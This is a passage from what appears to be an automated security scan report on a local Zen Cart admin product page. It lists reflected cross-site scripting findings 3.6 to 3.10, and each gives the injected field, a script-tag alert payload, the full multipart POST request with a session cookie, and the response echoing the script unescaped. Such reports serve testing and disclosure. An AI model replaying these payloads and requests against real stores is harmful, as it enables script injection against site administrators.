Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------31870220875781
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------31870220875781
Content-Disposition: form-data; name="products_model"

testval
-----------------------------31870220875781
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------31870220875781
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------31870220875781
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------31870220875781
Content-Disposition: form-data; name="image_delete"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="overwrite"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------31870220875781
Content-Disposition: form-data; name="products_url[2]"

>"><script>alert(14405309.15227)</script>
-----------------------------31870220875781
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------31870220875781
Content-Disposition: form-data; name="products_weight"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------31870220875781--



HTTP Response 
----Truncated due to large size ---

h="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/25" border="0" alt="3ds/25" title=" 3ds/25 " width="100" height="80" align="right" hspace="5" vspace="5">Default text        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://>"><script>alert(14405309.15227)</script>" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      

Finding 3.6:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_url[1]
Injection value: >"><script>alert(14405309.15247)</script>
Detection value: alert(14405309.15247)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview&page=1 HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=2&pID=2&action=new_product
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------31870220875781
Content-Length: 4870

-----------------------------31870220875781
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------31870220875781
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------31870220875781
Content-Disposition: form-data; name="x"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="y"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="master_category"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------31870220875781
Content-Disposition: form-data; name="products_status"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------31870220875781
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------31870220875781
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------31870220875781
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_price"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------31870220875781
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------31870220875781
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------31870220875781
Content-Disposition: form-data; name="products_model"

testval
-----------------------------31870220875781
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------31870220875781
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------31870220875781
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------31870220875781
Content-Disposition: form-data; name="image_delete"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="overwrite"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------31870220875781
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------31870220875781
Content-Disposition: form-data; name="products_url[1]"

>"><script>alert(14405309.15247)</script>
-----------------------------31870220875781
Content-Disposition: form-data; name="products_weight"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------31870220875781--



HTTP Response 
----Truncated due to large size ---

"100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/25" border="0" alt="3ds/25" title=" 3ds/25 " width="100" height="80" align="right" hspace="5" vspace="5">test        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://>"><script>alert(14405309.15247)</script>" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
<form name="update_product" action="http://localhost:8081/zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=update_product&page=1" method="post" enctype="multipart/form-data"><input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" />      <tr>
        <td align="right" class="smallText">
<input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" /><input type="hidden" name="products_date_added" value="2015-08-25 18:43:21" /><input type="hidden" name="x" value="0" /><input type="hidden" name="y" value="0" /><input 



Finding 3.7:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_description[2]
Injection value: <script>alert(14405309.33337)</script>
Detection value: <script>alert(14405309.33337)</script>

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------19864573418301
Content-Length: 4875

-----------------------------19864573418301
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------19864573418301
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------19864573418301
Content-Disposition: form-data; name="x"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="y"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="master_category"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------19864573418301
Content-Disposition: form-data; name="products_status"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------19864573418301
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------19864573418301
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------19864573418301
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_price"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------19864573418301
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_description[2]"

<script>alert(14405309.33337)</script>
-----------------------------19864573418301
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------19864573418301
Content-Disposition: form-data; name="products_model"

testval
-----------------------------19864573418301
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------19864573418301
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------19864573418301
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------19864573418301
Content-Disposition: form-data; name="image_delete"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="overwrite"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------19864573418301
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------19864573418301
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------19864573418301
Content-Disposition: form-data; name="products_weight"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------19864573418301--


HTTP Response 
----Truncated due to large size ---

pes</a></li>
              </ul>
    </li>
      </ul>
</div>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top">
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/25" border="0" alt="3ds/25" title=" 3ds/25 " width="100" height="80" align="right" hspace="5" vspace="5"><script>alert(14405309.33337)</script>        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=


Finding 3.8:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_description[1]
Injection value: <script>alert(14405309.33507)</script>
Detection value: <script>alert(14405309.33507)</script>

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------19864573418301
Content-Length: 4883

-----------------------------19864573418301
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------19864573418301
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------19864573418301
Content-Disposition: form-data; name="x"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="y"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="master_category"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------19864573418301
Content-Disposition: form-data; name="products_status"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------19864573418301
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------19864573418301
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------19864573418301
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_price"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------19864573418301
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------19864573418301
Content-Disposition: form-data; name="products_description[1]"

<script>alert(14405309.33507)</script>
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------19864573418301
Content-Disposition: form-data; name="products_model"

testval
-----------------------------19864573418301
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------19864573418301
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------19864573418301
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------19864573418301
Content-Disposition: form-data; name="image_delete"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="overwrite"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------19864573418301
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------19864573418301
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------19864573418301
Content-Disposition: form-data; name="products_weight"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------19864573418301--



HTTP Response
----Truncated due to large size ---
 
" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/25" border="0" alt="3ds/25" title=" 3ds/25 " width="100" height="80" align="right" hspace="5" vspace="5"><script>alert(14405309.33507)</script>        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
<form name="update_product" action="http://localhost:8081/zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=update_product" method="post" enctype="multipart/form-data"><input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" />      <tr>
        <td align="right" class="smallText">


Finding 3.9:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: img_dir
Injection value: >"><script>alert(14405309.33877)</script>
Detection value: alert(14405309.33877)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------19864573418301
Content-Length: 4886

-----------------------------19864573418301
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------19864573418301
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------19864573418301
Content-Disposition: form-data; name="x"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="y"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="master_category"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------19864573418301
Content-Disposition: form-data; name="products_status"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------19864573418301
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------19864573418301
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------19864573418301
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_price"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------19864573418301
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------19864573418301
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------19864573418301
Content-Disposition: form-data; name="products_model"

testval
-----------------------------19864573418301
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------19864573418301
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------19864573418301
Content-Disposition: form-data; name="img_dir"

>"><script>alert(14405309.33877)</script>
-----------------------------19864573418301
Content-Disposition: form-data; name="image_delete"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="overwrite"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------19864573418301
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------19864573418301
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------19864573418301
Content-Disposition: form-data; name="products_weight"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------19864573418301--


HTTP Response 
Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_types.php">Media Types</a></li>
              </ul>
    </li>
      </ul>
</div>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top">
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/>"><script>alert(14405309.33877)</script>25" border="0" alt=">"><script>alert(14405309.33877)</script>25" title=" >"><script>alert(14405309.33877)</script>25 " width="100" height="80" align="right" hspace="5" vspace="5">Default text        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspaci


Finding 3.10:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_image_manual
Injection value: >"><script>alert(14405309.33977)</script>
Detection value: alert(14405309.33977)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------19864573418301
Content-Length: 4888

-----------------------------19864573418301
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------19864573418301
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------19864573418301
Content-Disposition: form-data; name="x"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="y"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="master_category"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------19864573418301
Content-Disposition: form-data; name="products_status"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------19864573418301
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------19864573418301
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------19864573418301
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_price"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------19864573418301
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------19864573418301
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------19864573418301
Content-Disposition: form-data; name="products_model"

testval
-----------------------------19864573418301
